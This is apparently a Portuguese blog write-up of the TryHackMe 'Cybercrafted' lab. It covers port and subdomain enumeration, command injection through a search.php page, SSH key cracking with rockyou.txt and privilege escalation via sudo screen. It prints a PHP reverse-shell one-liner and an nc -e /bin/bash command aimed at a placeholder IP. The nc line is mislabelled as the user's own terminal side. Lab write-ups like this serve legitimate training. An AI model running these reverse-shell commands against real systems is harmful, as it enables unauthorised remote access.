Olá entusiastas de segurança da informação, hoje irei fazer o write up de uma máquina do TryhackMe chama “Cybercrafted”. Vendo a descrição da máquina podemos ver que terá um server de minecraft, linux e injection.
Dito isso fiz um nmap para mapear as portas e achei 3 delas.
Depois disso decidi verificar os subdomínios para ver se há algo para ser explorado. Acabei encontrando 3 novamente.
No subdomínio “admin” existe uma página de login, então fui verificar a “store”. Após verificar fui capaz de ver uma página de “Forbidden”.
Após perceber isso decidi fazer uma varredura nos diretórios desse subdomínio. Então fui capaz de achar uma página chamada “search.php”.
Pelo visto podemos rodar comandos linux nele, com isso peguei um comando para fazer uma reverse shell e obter acesso ao sistema.
(SEARCH.PHP)
php -r '$sock=fsockopen("IP",PORTA);exec("/bin/sh -i <&3 >&3 2>&3");'(SEU TERMINAL)nc -e /bin/bash IP PORTA
Após conseguir o acesso procurei por formas de escalar privilégios e encontrei uma chave do ssh.
Depois de encontrar decidi descriptografar usando a lista “rockyou.txt”.
Fui capaz de achar a senha e consegui logar usando o ssh.
Após isso procurei a flag do minecraft usando o comando find.
Depois de encontrar a flag fui vasculhar os diretórios que estavam disponíveis e achei algo interessante.
Aqui conseguimos escalar mais um privilégio devido à uma senha exposta.
Usando o sudo -l podemos ver que podemos usar o comando screen como sudo. Feito isso decidi vasculhar a documentação desse binário.
Consegui achar esse comando onde cria uma janela com shell. Após testar
sudo /usr/bin/screen -r cybercrafted
